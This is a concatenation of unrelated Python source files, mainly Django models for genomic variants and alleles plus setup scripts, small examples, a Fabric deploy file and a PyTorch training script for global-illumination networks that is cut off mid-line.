self.flag_collection_safe.get_or_create_open_flag_of_type(flag_type=allele_flag_types.missing_37, only_if_new=True)
if v38:
self.close_open_flags_of_type(allele_flag_types.missing_38)
else:
self.flag_collection_safe.get_or_create_open_flag_of_type(flag_type=allele_flag_types.missing_38, only_if_new=True)
allele_validate_signal.send(sender=Allele, allele=self)
@receiver(flag_collection_extra_info_signal, sender=FlagCollection)
def get_extra_info(flag_infos: FlagInfos, user: User, **kwargs): # pylint: disable=unused-argument
alleles = Allele.objects.filter(flag_collection__in=flag_infos.ids)
allele: Allele
for allele in alleles:
flag_infos.set_extra_info(allele.flag_collection_id, {
'label': f'Allele {allele.id}'
}, source_object=allele)
class AlleleMergeLog(TimeStampedModel):
""" Keep track of calls to Allele.merge() """
old_allele = models.ForeignKey(Allele, related_name="old_allele_merge", on_delete=CASCADE)
new_allele = models.ForeignKey(Allele, related_name="new_allele_merge", on_delete=CASCADE)
conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices)
success = models.BooleanField(default=True)
message = models.TextField(null=True)
VariantCoordinate = collections.namedtuple('VariantCoordinate', 'chrom pos ref alt')
class Sequence(models.Model):
"""
We want to guarantee seq is unique (so Locus/Variant can have unique constraints)
    Postgres by default uses indexes for constraints, and large TextFields give an error of:
"index row requires x bytes, maximum size is 8191"
The easiest solution is to md5sum seq and make the constraint on that. Another possible solution is to use
Gist indexes but that requires installing the btree_gist extension (requires postgres Admin rights).
        Django 3 has ExclusionConstraint, and Postgres contrib has BtreeGistExtension which can be added via a migration
"""
seq = models.TextField()
seq_md5_hash = models.CharField(max_length=32, unique=True)
length = models.IntegerField()
def save(self, force_insert=False, force_update=False, using=None, update_fields=None):
if not self.seq_md5_hash:
self.seq_md5_hash = md5sum_str(self.seq)
super().save(force_insert=force_insert, force_update=force_update, using=using, update_fields=update_fields)
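    # Sketch of the md5-based design from the class docstring (illustrative only):
    # the unique constraint lives on seq_md5_hash, so lookups for an existing sequence
    # should go via the hash rather than the unindexed seq TextField, e.g.:
    #
    #   existing = Sequence.objects.filter(seq_md5_hash=md5sum_str("GATTACA")).first()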
@staticmethod
def abbreviate(s: str, max_length: int = 20):
if len(s) > max_length:
s = f"{s[:3]}...{s[-3:]}"
return s
def __str__(self):
return self.abbreviate(self.seq)
@staticmethod
def get_pk_by_seq(q=None):
qs = Sequence.objects.all()
if q:
qs = qs.filter(q)
return dict(qs.values_list("seq", "pk"))
def is_standard_sequence(self):
""" only contains G/A/T/C/N """
        # re.search rather than re.match so a non-GATCN base anywhere in the sequence is caught
        return not re.search(r"[^GATCN]", self.seq)
class Locus(models.Model):
""" 1 per line in a VCF file (multiple Variants with different alt alleles point to the same locus)
There is only 1 Locus for a given chrom/position/ref per database (handled via insertion queues) """
contig = models.ForeignKey(Contig, on_delete=CASCADE)
position = models.IntegerField(db_index=True)
ref = models.ForeignKey(Sequence, on_delete=CASCADE)
class Meta:
unique_together = ("contig", "position", "ref")
@property
def chrom(self):
return self.contig.name
def __str__(self):
return f"{self.chrom}:{self.position} {self.ref}"
class Variant(models.Model):
""" Variants represent the different alleles at a locus
Usually 2+ per line in a VCF file (ref + >= 1 alts pointing to the same locus for the row)
There is only 1 Variant for a given locus/alt per database (handled via insertion queues) """
REFERENCE_ALT = "="
locus = models.ForeignKey(Locus, on_delete=CASCADE)
alt = models.ForeignKey(Sequence, on_delete=CASCADE)
class Meta:
unique_together = ("locus", "alt")
@staticmethod
def get_chrom_q(chrom):
return Q(locus__contig__name__iexact=chrom) | Q(locus__contig__ucsc_name__iexact=chrom)
@staticmethod
def get_contigs_q(genome_build: GenomeBuild):
""" Restrict to contigs in a genome build """
return Q(locus__contig__genomebuildcontig__genome_build=genome_build)
@staticmethod
def get_no_reference_q():
return ~Q(alt__seq=Variant.REFERENCE_ALT)
@staticmethod
def get_overlap_annotate_and_q(contig, start, end):
""" Query handling indels. Contigs must match and variant.start <= end AND variant.end_position >= start """
annotation_kwargs = {"longest_sequence": Greatest("locus__ref__length", "alt__length"),
"end_position": F("locus__position") + F("longest_sequence")}
q = Q(locus__contig=contig, locus__position__lte=end, end_position__gte=start)
return annotation_kwargs, q
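    # Illustrative use of the annotation kwargs + Q returned above to find variants
    # overlapping a region (assumes `contig` is a Contig from the build of interest):
    #
    #   annotation_kwargs, q = Variant.get_overlap_annotate_and_q(contig, start=1000, end=2000)
    #   overlapping = Variant.objects.annotate(**annotation_kwargs).filter(q)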
@staticmethod
def annotate_variant_string(qs, name="variant_string", path_to_variant=""):
""" Return a "1:123321 G>C" style string in a query """
kwargs = {name: Concat(f"{path_to_variant}locus__contig__name", V(":"),
f"{path_to_variant}locus__position", V(" "),
f"{path_to_variant}locus__ref__seq", V(">"),
f"{path_to_variant}alt__seq", output_field=TextField())}
return qs.annotate(**kwargs)
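    # Example (illustrative) of reading the "1:123321 G>C" style string off a queryset:
    #
    #   qs = Variant.annotate_variant_string(Variant.objects.all())
    #   first_variant_string = qs.values_list("variant_string", flat=True).first()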
@staticmethod
def format_tuple(chrom, position, ref, alt, abbreviate=False) -> str:
if abbreviate:
ref = Sequence.abbreviate(ref)
alt = Sequence.abbreviate(alt)
return f"{chrom}:{position} {ref}>{alt}"
@staticmethod
def get_tuple_from_string(variant_string: str, genome_build: GenomeBuild,
                              regex_pattern: Pattern[str] = VARIANT_PATTERN) -> Optional[VariantCoordinate]:
""" regex_pattern - has to have 4 groups, returns (chrom, position, ref, alt) """
variant_tuple = None
if m := regex_pattern.match(variant_string):
chrom, position, ref, alt = m.groups()
chrom, position, ref, alt = Variant.clean_variant_fields(chrom, position, ref, alt,
want_chr=genome_build.reference_fasta_has_chr)
contig = genome_build.chrom_contig_mappings[chrom]
variant_tuple = VariantCoordinate(contig.name, int(position), ref, alt)
return variant_tuple
@staticmethod
def get_from_string(variant_string: str, genome_build: GenomeBuild,
regex_pattern=VARIANT_PATTERN) -> Optional['Variant']:
variant_tuple = Variant.get_tuple_from_string(variant_string, genome_build, regex_pattern=regex_pattern)
try:
return Variant.get_from_tuple(variant_tuple, genome_build)
except Variant.DoesNotExist:
return None
@staticmethod
def get_from_tuple(variant_tuple: VariantCoordinate, genome_build: GenomeBuild) -> 'Variant':
params = ["locus__contig__name", "locus__position", "locus__ref__seq", "alt__seq"]
return Variant.objects.get(locus__contig__genomebuildcontig__genome_build=genome_build,
**dict(zip(params, variant_tuple)))
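    # Illustrative round trip for the two helpers above (assumes the variant was imported
    # for the given build, otherwise Variant.DoesNotExist is raised by get_from_tuple):
    #
    #   variant_tuple = Variant.get_tuple_from_string("1:123321 G>C", genome_build)
    #   variant = Variant.get_from_tuple(variant_tuple, genome_build)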
@lazy
def genome_builds(self) -> Set['GenomeBuild']:
gbc_qs = GenomeBuildContig.objects.filter(genome_build__in=GenomeBuild.builds_with_annotation(),
contig__locus__variant=self)
return {gbc.genome_build for gbc in gbc_qs}
@lazy
def coordinate(self) -> VariantCoordinate:
locus = self.locus
contig = locus.contig
return VariantCoordinate(chrom=contig.name, pos=locus.position, ref=locus.ref.seq, alt=self.alt.seq)
@staticmethod
def is_ref_alt_reference(ref, alt):
return ref == alt or alt == '.'
@property
def is_reference(self) -> bool:
return self.alt.seq == self.REFERENCE_ALT
@property
def is_standard_variant(self) -> bool:
""" Variant alt sequence is standard [GATCN] (ie not special or reference) """
# locus.ref should always be standard...
return self.alt.is_standard_sequence()
@property
def is_indel(self) -> bool:
return self.alt.seq != Variant.REFERENCE_ALT and self.locus.ref.length != self.alt.length
@property
def is_insertion(self) -> bool:
return self.alt.seq != Variant.REFERENCE_ALT and self.locus.ref.length < self.alt.length
@property
def is_deletion(self) -> bool:
return self.alt.seq != Variant.REFERENCE_ALT and self.locus.ref.length > self.alt.length
@property
def can_have_clingen_allele(self) -> bool:
return self.is_standard_variant or self.is_reference
@property
def can_have_annotation(self) -> bool:
return self.is_standard_variant
def as_tuple(self) -> VariantCoordinate:
        return VariantCoordinate(self.locus.contig.name, self.locus.position, self.locus.ref.seq, self.alt.seq)
def is_abbreviated(self):
return str(self) != self.full_string
@lazy
def full_string(self):
""" No abbreviation """
return self.format_tuple(*self.as_tuple())
def __str__(self):
return self.format_tuple(self.locus.contig.name, self.locus.position, self.locus.ref, self.alt)
def get_absolute_url(self):
# will show allele if there is one, otherwise go to variant page
return reverse('view_allele_from_variant', kwargs={"variant_id": self.pk})
@lazy
def allele(self) -> Optional[Allele]:
va = VariantAllele.objects.filter(variant=self).first()
if va:
return va.allele
return None
@property
def equivalent_variants(self) -> Iterable['Variant']:
allele = self.allele
if not allele:
return [self]
return Variant.objects.filter(variantallele__allele=allele)
def get_canonical_transcript_annotation(self, genome_build) -> Optional['VariantTranscriptAnnotation']:
vav = genome_build.latest_variant_annotation_version
return self.varianttranscriptannotation_set.filter(version=vav, canonical=True).first()
def get_best_variant_transcript_annotation(self, genome_build) -> Optional['VariantTranscriptAnnotation']:
vav = genome_build.latest_variant_annotation_version
if can := self.varianttranscriptannotation_set.filter(version=vav, canonical=True).first():
return can
if version := self.varianttranscriptannotation_set.filter(version=vav).first():
return version
if any_at_all := self.varianttranscriptannotation_set.first():
return any_at_all
def get_canonical_c_hgvs(self, genome_build):
c_hgvs = None
if cta := self.get_canonical_transcript_annotation(genome_build):
c_hgvs = cta.hgvs_c
return c_hgvs
@property
def start(self):
return self.locus.position
@property
def end(self):
return self.locus.position + max(self.locus.ref.length, self.alt.length)
@staticmethod
def clean_variant_fields(chrom, position, ref, alt, want_chr):
ref = ref.strip().upper()
alt = alt.strip().upper()
if Variant.is_ref_alt_reference(ref, alt):
alt = Variant.REFERENCE_ALT
chrom = format_chrom(chrom, want_chr)
return chrom, position, ref, alt
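    # Example of the normalization performed above (illustrative):
    #
    #   clean_variant_fields("1", 123321, " g ", ".", want_chr=True) -> ("chr1", 123321, "G", "=")
    #
    # i.e. ref/alt are upper-cased, "." / ref==alt alts become the reference marker "=",
    # and the chrom gains or loses its "chr" prefix to match the reference FASTA naming.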
class VariantWiki(Wiki):
variant = models.OneToOneField(Variant, on_delete=CASCADE)
class VariantAllele(TimeStampedModel):
""" It's possible for multiple variants from the same genome build to
resolve to the same allele (due to our normalization not being the same as ClinGen
or 2 loci in a genome build being represented by 1 loci in the build being used
by ClinGen) - but it's not likely. It's a bug to have the same 3 variant/build/allele
so we can add that unique_together constraint
We only expect to store Alleles for a small fraction of Variants
So don't want them on the Variant object - instead do 1-to-1 """
# Some builds share contigs (eg GRCh37/38 share MT and some unplaced scaffolds) - in those cases
# we'll have the same variant linked through different VariantAlleles (so it can't be 1-to-1)
variant = models.ForeignKey(Variant, on_delete=CASCADE)
genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE)
allele = models.ForeignKey(Allele, on_delete=CASCADE)
origin = models.CharField(max_length=1, choices=AlleleOrigin.choices)
conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices)
error = models.JSONField(null=True) # Only set on error
class Meta:
unique_together = ("variant", "genome_build", "allele")
@property
def canonical_c_hgvs(self):
return self.variant.get_canonical_c_hgvs(self.genome_build)
def needs_clingen_call(self):
if settings.CLINGEN_ALLELE_REGISTRY_LOGIN and self.allele.clingen_allele is None:
if self.error:
# Retry if server was down
return self.error.get("errorType") == ClinGenAllele.CLINGEN_ALLELE_SERVER_ERROR_TYPE
return True
return False
def __str__(self):
return f"{self.allele} - {self.variant_id}({self.genome_build}/{self.conversion_tool})"
class VariantCollection(RelatedModelsPartitionModel):
""" A set of variants - usually used as a cached result """
RECORDS_BASE_TABLE_NAMES = ["snpdb_variantcollectionrecord"]
RECORDS_FK_FIELD_TO_THIS_MODEL = "variant_collection_id"
PARTITION_LABEL_TEXT = "variant_collection"
name = models.TextField(null=True)
count = models.IntegerField(null=True)
status = models.CharField(max_length=1, choices=ProcessingStatus.choices, default=ProcessingStatus.CREATED)
@property
def variant_collection_alias(self):
return f"variantcollection_{self.pk}"
def get_annotation_kwargs(self):
vcr_condition = Q(variantcollectionrecord__variant_collection=self)
return {self.variant_collection_alias: FilteredRelation('variantcollectionrecord', condition=vcr_condition)}
def get_q(self):
if self.status != ProcessingStatus.SUCCESS:
raise ValueError(f"{self}: status {self.get_status_display()} != SUCCESS")
return Q(**{f"{self.variant_collection_alias}__isnull": False})
def __str__(self):
return f"VariantCollection: {self.pk} ({self.name})"
class VariantCollectionRecord(models.Model):
variant_collection = models.ForeignKey(VariantCollection, on_delete=DO_NOTHING) # handled via drop partition
variant = models.ForeignKey(Variant, on_delete=CASCADE)
class AlleleSource(models.Model):
""" Provides a source of alleles for liftover pipelines. """
objects = InheritanceManager()
def get_genome_build(self):
return None
def get_variants_qs(self):
return Variant.objects.none()
def get_allele_qs(self):
return Allele.objects.filter(variantallele__variant__in=self.get_variants_qs())
def liftover_complete(self, genome_build: GenomeBuild):
""" This is called at the end of a liftover pipeline (once per build) """
pass
class VariantAlleleSource(AlleleSource):
variant_allele = models.ForeignKey(VariantAllele, on_delete=CASCADE)
def get_genome_build(self):
return self.variant_allele.genome_build
def get_variants_qs(self):
return Variant.objects.filter(variantallele=self.variant_allele)
@staticmethod
def get_liftover_for_allele(allele, genome_build) -> Optional['Liftover']:
""" Only works if liftover was done via VariantAlleleSource """
allele_sources_qs = VariantAlleleSource.objects.filter(variant_allele__allele=allele)
return Liftover.objects.filter(allele_source__in=allele_sources_qs, genome_build=genome_build).first()
class VariantAlleleCollectionSource(AlleleSource):
genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE)
def get_genome_build(self):
return self.genome_build
def get_variants_qs(self):
return Variant.objects.filter(variantallele__in=self.get_variant_allele_ids())
def get_variant_allele_ids(self):
return self.variantallelecollectionrecord_set.values_list("variant_allele", flat=True)
class VariantAlleleCollectionRecord(models.Model):
collection = models.ForeignKey(VariantAlleleCollectionSource, on_delete=CASCADE)
variant_allele = models.ForeignKey(VariantAllele, on_delete=CASCADE)
class Liftover(TimeStampedModel):
""" Liftover pipeline involves reading through a VCF where ID is set to Allele.pk and then creating
VariantAllele entries for the variant/allele
    For some AlleleConversionTools (eg ClinGen AlleleRegistry) we can write the VCF in the desired genome build directly
For others (NCBI Remap) we need to write the source genome build VCF first
Alleles must have already been created - allele_source used to retrieve them
The VCF (in genome_build build) is set in UploadedFile for the UploadPipeline """
user = models.ForeignKey(User, on_delete=CASCADE)
allele_source = models.ForeignKey(AlleleSource, on_delete=CASCADE)
conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices)
source_vcf = models.TextField(null=True)
source_genome_build = models.ForeignKey(GenomeBuild, null=True, on_delete=CASCADE,
related_name="liftover_source_genome_build")
genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE) # destination
def get_allele_source(self) -> AlleleSource:
""" Returns subclass instance """
return AlleleSource.objects.get_subclass(pk=self.allele_source_id)
def get_allele_qs(self) -> QuerySet:
return self.get_allele_source().get_allele_qs()
def complete(self):
self.get_allele_source().liftover_complete(genome_build=self.genome_build)
def __str__(self):
source = ""
if self.source_genome_build:
source = f"from {self.source_genome_build.name} "
return f"Liftover {source}to {self.genome_build} via {self.get_conversion_tool_display()}"
class LiftoverError(models.Model):
liftover = models.ForeignKey(Liftover, on_delete=CASCADE)
allele = models.ForeignKey(Allele, on_delete=CASCADE)
variant = models.ForeignKey(Variant, null=True, on_delete=CASCADE) # Optional, if got a variant but invalid
error_message = models.TextField()
class Meta:
unique_together = ('liftover', 'allele')
def __str__(self):
return f"{self.allele} failed {self.liftover}: {self.error_message}"
| 1.671875 | 2 |
setup.py | KaiAnalytics/qualtrics_mailer | 6 | 12796595 | <filename>setup.py
from setuptools import setup
setup(
name='qualtrics_mailer',
version='0.1',
description='A package for distributing pre-built surveys in Qualtrics',
keywords='qualtrics survey',
url='http://github.com/kaianalytics/qualtrics_mailer',
author='<NAME>',
author_email='<EMAIL>',
license='MIT',
classifiers=[
'Programming Language :: Python :: 3.6'
],
packages=[
'qualtrics_mailer'
],
install_requires=[
'pandas',
'requests'
],
zip_safe=False
)
| 1.460938 | 1 |
models/__init__.py | respect5716/Tensorflow_Cifar10 | 0 | 12796596 | <reponame>respect5716/Tensorflow_Cifar10<gh_stars>0
import tensorflow as tf
from .vgg import *
from .resnet import *
from .resnext import *
from .preact_resnet import *
from .densenet import *
from .dpn import *
from .dla import *
from .senet import *
def create_model(model_name, initializer, weight_decay):
model_dict = {
'vgg': VGG11,
'resnet': ResNet56,
'preact_resnet': PreactResNet56,
'resnext': ResNext20_4x16d,
'densenet': DenseNet57,
'dpn': DPN32,
'senet': SENet26,
'dla': DLA,
}
regularizer = tf.keras.regularizers.l2(weight_decay)
kwargs = {
'kernel_initializer': initializer,
'kernel_regularizer': regularizer,
}
model = model_dict[model_name](**kwargs)
print(model.summary())
return model | 2.078125 | 2 |
codewars/python/Inc_dec_test.py | James992927108/practice | 0 | 12796597 | <gh_stars>0
import sys
sys.dont_write_bytecode = True
import unittest
import inc_dec
class Test_TestIncrementDecrement(unittest.TestCase):
def test_increment(self):
        self.assertEqual(inc_dec.increment(3), 4)
def test_decrement(self):
        self.assertEqual(inc_dec.decrement(3), 2)
if __name__ == '__main__':
unittest.main()
| 2.65625 | 3 |
understanding_loop_control.py | brucestull/PythonLearning | 2 | 12796598 | # Second edit.
# Added feature_01.
# Create two nested 'for' loops.
for x in range(1,5):
print(f"Start of x:{x} loop.")
for y in range(1,5):
print(f"Start of y:{y} loop.")
if y == 3:
print(x, y, 'breaking')
# print("Only 'break' out of inner 'y' loop.")
break
else:
print(x, y, f"continuing. AKA end of y:{y} loop." )
# print("Will this start at beginning of 'y' loop?")
continue
        # Code here is not reachable since the preceding 'if' -> 'else' always breaks or continues.
        print("Code here is not reachable since the preceding 'if' -> 'else' always breaks or continues.")
print("Just finished all the 'y' loops.")
print(f"Also, just finished x:{x} loop.")
print("Just finished all the 'x' loops.")
| 4.125 | 4 |
setup.py | timniven/hsdbi | 0 | 12796599 | <reponame>timniven/hsdbi<gh_stars>0
from setuptools import setup, find_packages
# python setup.py sdist upload -r pypi
setup(
name='hsdbi',
packages=find_packages(exclude=['testing']),
version='0.1a18',
description='A simple interface for accessing databases.',
author='<NAME>',
author_email='<EMAIL>',
url='https://github.com/timniven/hsdbi',
download_url='https://github.com/timniven/hsdbi/archive/0.1a18.tar.gz',
license='MIT',
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Topic :: Software Development :: Libraries :: Python Modules',
'Programming Language :: Python :: 3',
'License :: OSI Approved :: MIT License',
],
keywords='database interface facade',
install_requires=[
'pymongo',
'sqlalchemy'
]
)
| 1.234375 | 1 |
fabfile/__init__.py | doutriaux1/ocgis | 1 | 12796600 | from fabric.decorators import task
from fabric.operations import run, sudo, local
from ConfigParser import ConfigParser
import geospatial
from fabric.context_managers import lcd
cp = ConfigParser()
cp.read('ocgis.cfg')
if cp.get('install','location') == 'local':
run = local
cd = lcd
def lsudo(op):
local('sudo {0}'.format(op))
sudo = lsudo
SRC = cp.get('install','src')
INSTALL = cp.get('install','install')
J = cp.get('install','j')
@task(default=True)
def deploy():
# geospatial.install_hdf()
geospatial.install_netCDF4() | 2 | 2 |
examples/simpleApp.py | tgolsson/appJar | 666 | 12796601 | <filename>examples/simpleApp.py
# import the library
from appJar import gui
app = gui() # top slice - CREATE the GUI
app.addLabel("title", "Welcome to appJar") # add a label
app.setLabelBg("title", "red") # set the label's background to be red
app.go() # bottom slice - START the GUI
| 3.015625 | 3 |
example/simple/lib.py | viniciusfeitosa/pychecko | 5 | 12796602 | <reponame>viniciusfeitosa/pychecko
def bar(self):
self.email = '<EMAIL>'
| 1.359375 | 1 |
trainGlobalIllumination.py | YouweiLyu/SingleImageShapeAndSVBRDF | 60 | 12796603 | import torch
import numpy as np
from torch.autograd import Variable
import torch.optim as optim
import argparse
import random
import os
import models
import torchvision.utils as vutils
import utils
import dataLoader
from torch.utils.data import DataLoader
parser = argparse.ArgumentParser()
# The locationi of training set
parser.add_argument('--dataRoot', default='/home/zhl/SiggraphAsia18/Data/train/', help='path to images')
parser.add_argument('--experiment', default=None, help='the path to store samples and models')
# The basic training setting
parser.add_argument('--nepoch', type=int, default=18, help='the number of epochs for training')
parser.add_argument('--batchSize', type=int, default=16, help='input batch size')
parser.add_argument('--imageSize', type=int, default=256, help='the height / width of the input image to network')
parser.add_argument('--cuda', action='store_true', help='enables cuda')
parser.add_argument('--deviceIds', type=int, nargs='+', default=[0], help='the gpus used for training network')
# The training weight
parser.add_argument('--globalIllu2', type=float, default=1, help='the weight of global illumination prediction 2')
parser.add_argument('--globalIllu3', type=float, default=1, help='the weight of global illumination prediction 3')
# Fine Tune the network
parser.add_argument('--isFineTune', action = 'store_true', help='whether to fine-tune the network or not')
parser.add_argument('--epochId', type=int, default = -1, help='the training epoch of the network')
# The detail network setting
parser.add_argument('--cascadeLevel', type=int, default=0, help='how much level of cascades should we use')
opt = parser.parse_args()
print(opt)
assert(opt.cascadeLevel == 0 )
if opt.experiment is None:
opt.experiment = 'check_globalillumination'
os.system('mkdir {0}'.format(opt.experiment) )
os.system('cp *.py %s' % opt.experiment )
g2W, g3W = opt.globalIllu2, opt.globalIllu3
opt.gpuId = opt.deviceIds[0]
opt.seed = random.randint(1, 10000)
print("Random Seed: ", opt.seed)
random.seed(opt.seed)
torch.manual_seed(opt.seed)
if torch.cuda.is_available() and not opt.cuda:
print("WARNING: You have a CUDA device, so you should probably run with --cuda")
####################################
# initialize tensors
albedoBatch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) )
normalBatch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) )
roughBatch = Variable(torch.FloatTensor(opt.batchSize, 1, opt.imageSize, opt.imageSize) )
segBatch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) )
depthBatch = Variable(torch.FloatTensor(opt.batchSize, 1, opt.imageSize, opt.imageSize) )
imP1Batch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) )
imP2Batch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) )
imP3Batch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) )
# Global illumination
globIllu1to2 = models.globalIllumination()
globIllu2to3 = models.globalIllumination()
#########################################
if opt.isFineTune:
globIllu1to2.load_state_dict(torch.load('{0}/globIllu1to2_{1}.pth'.format(opt.experiment, opt.epochId) ) )
globIllu2to3.load_state_dict(torch.load('{0}/globIllu2to3_{1}.pth'.format(opt.experiment, opt.epochId) ) )
############## ######################
# Send things into GPU
if opt.cuda:
albedoBatch = albedoBatch.cuda(opt.gpuId)
normalBatch = normalBatch.cuda(opt.gpuId)
roughBatch = roughBatch.cuda(opt.gpuId)
depthBatch = depthBatch.cuda(opt.gpuId)
segBatch = segBatch.cuda(opt.gpuId)
imP1Batch = imP1Batch.cuda(opt.gpuId)
imP2Batch = imP2Batch.cuda(opt.gpuId)
imP3Batch = imP3Batch.cuda(opt.gpuId)
globIllu1to2 = globIllu1to2.cuda(opt.gpuId)
globIllu2to3 = globIllu2to3.cuda(opt.gpuId)
####################################
####################################
# Global Optimier
opGlobalIllu1to2 = optim.Adam(globIllu1to2.parameters(), lr=2e-4, betas=(0.5, 0.999) )
opGlobalIllu2to3 = optim.Adam(globIllu2to3.parameters(), lr=2e-4, betas=(0.5, 0.999) )
#####################################
####################################
brdfDataset = dataLoader.BatchLoader(opt.dataRoot, imSize = opt.imageSize)
brdfLoader = DataLoader(brdfDataset, batch_size = opt.batchSize, num_workers = 8, shuffle = False)
j = 0
globalIllu1ErrsNpList= np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32)
globalIllu2ErrsNpList = np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32)
globalIllu3ErrsNpList= np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32)
renderedErrsNpList = np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32)
for epoch in list(range(opt.epochId+1, opt.nepoch) ):
trainingLog = open('{0}/trainingLog_{1}.txt'.format(opt.experiment, epoch), 'w')
for i, dataBatch in enumerate(brdfLoader):
j += 1
# Load data from cpu to gpu
albedo_cpu = dataBatch['albedo']
albedoBatch.data.resize_(albedo_cpu.shape)
albedoBatch.data.copy_(albedo_cpu )
normal_cpu = dataBatch['normal']
normalBatch.data.resize_(normal_cpu.shape)
normalBatch.data.copy_(normal_cpu )
rough_cpu = dataBatch['rough']
roughBatch.data.resize_(rough_cpu.shape)
roughBatch.data.copy_(rough_cpu )
seg_cpu = dataBatch['seg']
segBatch.data.resize_(seg_cpu.shape)
segBatch.data.copy_(seg_cpu )
depth_cpu = dataBatch['depth']
depthBatch.data.resize_(depth_cpu.shape)
depthBatch.data.copy_(depth_cpu )
imP1_cpu = dataBatch['imP1']
imP1Batch.data.resize_(imP1_cpu.shape)
imP1Batch.data.copy_(imP1_cpu )
imP2_cpu = dataBatch['imP2']
imP2Batch.data.resize_(imP2_cpu.shape)
imP2Batch.data.copy_(imP2_cpu )
imP3_cpu = dataBatch['imP3']
imP3Batch.data.resize_(imP3_cpu.shape)
imP3Batch.data.copy_(imP3_cpu )
opGlobalIllu1to2.zero_grad()
opGlobalIllu2to3.zero_grad()
########################################################
# Build the cascade network architecture #
globalIllu2s = []
globalIllu3s = []
n = 0
inputGlob2 = torch.cat([imP1Batch, albedoBatch,
normalBatch, roughBatch, depthBatch, segBatch], dim=1)
globalIllu2 = globIllu1to2(inputGlob2)
globalIllu2s.append(globalIllu2 )
inputGlob3 = torch.cat([globalIllu2s[n], albedoBatch,
normalBatch, roughBatch, depthBatch, segBatch], dim=1)
globalIllu3 = globIllu2to3(inputGlob3.detach() )
globalIllu3s.append(globalIllu3)
########################################################
globalIllu2Errs = []
globalIllu3Errs = []
pixelNum = torch.sum(segBatch ).cpu().data.item()
for m in range(0, n + 1):
globalIllu2Errs.append( torch.sum( (globalIllu2s[m] - imP2Batch)
* (globalIllu2s[m] - imP2Batch) * segBatch.expand_as(imP2Batch) ) / pixelNum / 3.0 )
globalIllu3Errs.append(torch.sum( (globalIllu3s[m] - imP3Batch)
* (globalIllu3s[m] - imP3Batch) * segBatch.expand_as(imP3Batch) ) / pixelNum / 3.0 )
globalIllu2ErrSum = sum(globalIllu2Errs)
globalIllu3ErrSum = sum(globalIllu3Errs)
totalErr = g2W * globalIllu2ErrSum + g3W * globalIllu3ErrSum
totalErr.backward()
opGlobalIllu1to2.step()
opGlobalIllu2to3.step()
# Output training error
utils.writeErrToScreen('globalIllu2', globalIllu2Errs, epoch, j)
utils.writeErrToScreen('globalIllu3', globalIllu3Errs, epoch, j)
utils.writeErrToFile('globalIllu2', globalIllu2Errs, trainingLog, epoch, j)
utils.writeErrToFile('globalIllu3', globalIllu3Errs, trainingLog, epoch, j)
globalIllu2ErrsNpList = np.concatenate( [globalIllu2ErrsNpList, utils.turnErrorIntoNumpy(globalIllu2Errs)], axis=0)
globalIllu3ErrsNpList = np.concatenate( [globalIllu3ErrsNpList, utils.turnErrorIntoNumpy(globalIllu3Errs)], axis=0)
if j < 1000:
            utils.writeNpErrToScreen('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[1:j+1, :], axis=0), epoch, j)
utils.writeNpErrToScreen('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[1:j+1, :], axis=0), epoch, j)
utils.writeNpErrToFile('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[1:j+1, :], axis=0), trainingLog, epoch, j)
utils.writeNpErrToFile('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[1:j+1, :], axis=0), trainingLog, epoch, j)
else:
utils.writeNpErrToScreen('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[j-999:j+1, :], axis=0), epoch, j)
utils.writeNpErrToScreen('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[j-999:j+1, :], axis=0), epoch, j)
utils.writeNpErrToFile('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[j-999:j+1, :], axis=0), trainingLog, epoch, j)
utils.writeNpErrToFile('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[j-999:j+1, :], axis=0), trainingLog, epoch, j)
if j == 1 or j == 1000 or j% 2000 == 0:
# Save the ground truth and the input
vutils.save_image( (0.5*(albedoBatch + 1)*segBatch.expand_as(albedoBatch) ).data,
'{0}/{1}_albedoGt.png'.format(opt.experiment, j) )
vutils.save_image( (0.5*(normalBatch + 1)*segBatch.expand_as(normalBatch) ).data,
'{0}/{1}_normalGt.png'.format(opt.experiment, j) )
vutils.save_image( (0.5*(roughBatch + 1)*segBatch.expand_as(roughBatch) ).data,
'{0}/{1}_roughGt.png'.format(opt.experiment, j) )
depthOut = 1 / torch.clamp(depthBatch, 1e-6, 10) * segBatch.expand_as(depthBatch)
depthOut = (depthOut - 0.25) /0.8
vutils.save_image( ( depthOut*segBatch.expand_as(depthBatch) ).data,
'{0}/{1}_depthGt.png'.format(opt.experiment, j) )
vutils.save_image( ( ( 0.5*(imP1Batch + 1)*segBatch.expand_as(imP1Batch))**(1.0/2.2) ).data ,
'{0}/{1}_imP1.png'.format(opt.experiment, j) )
vutils.save_image( ( ( 0.5*(imP2Batch + 1)*segBatch.expand_as(imP2Batch))**(1.0/2.2) ).data ,
'{0}/{1}_imP2.png'.format(opt.experiment, j) )
vutils.save_image( ( ( 0.5*(imP3Batch + 1)*segBatch.expand_as(imP3Batch))**(1.0/2.2) ).data ,
'{0}/{1}_imP3.png'.format(opt.experiment, j) )
# Save the predicted results
for n in range(0, opt.cascadeLevel + 1):
vutils.save_image( ( ( 0.5*(globalIllu2s[n] + 1)*segBatch.expand_as(imP2Batch) )**(1.0/2.2) ).data,
